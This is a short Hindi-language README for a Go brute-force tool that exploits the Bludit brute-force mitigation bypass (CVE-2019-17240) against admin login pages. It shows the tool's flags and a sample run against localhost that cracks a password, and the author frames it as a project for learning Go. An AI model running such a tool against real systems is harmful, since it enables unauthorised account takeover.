
Go-आधारित ब्रूट-फोर्स टूल जो Bludit ब्रूटफोर्स शमन बायपास (CVE-2019-17240) का शोषण करता है, एडमिन लॉगिन पेजों के खिलाफ स्वचालित पासवर्ड क्रैकिंग के लिए।
यह एक छोटा प्रोजेक्ट है जहाँ मैंने इस पायथन स्क्रिप्ट को गोलंग में फिर से लिखा है। इस प्रोजेक्ट का उद्देश्य गोलंग सीखना और यह समझना था कि यह एक्सप्लॉइट कैसे काम करता है।
$ ./brutepass -sdasds
flag provided but not defined: -sdasds
Usage of ./brutepass:
-c int
Threads (default 5) (default 5)
-l string
Hostname eg... http://127.0.0.1/admin/login.php
-p string
Password file
-u string
Enter username
थ्रेड्स फ्लैग को छोड़कर बाकी सभी फ्लैग अनिवार्य हैं।
$ ./cve-2019-17240 -p pass.txt -u admin -l "http://127.0.0.1/admin/login.php"
Total requests sent: 10
Total requests sent: 20
Total requests sent: 30
Total requests sent: 40
Total requests sent: 50
Total requests sent: 60
Total requests sent: 65
==========Password Cracked=============
Password: Password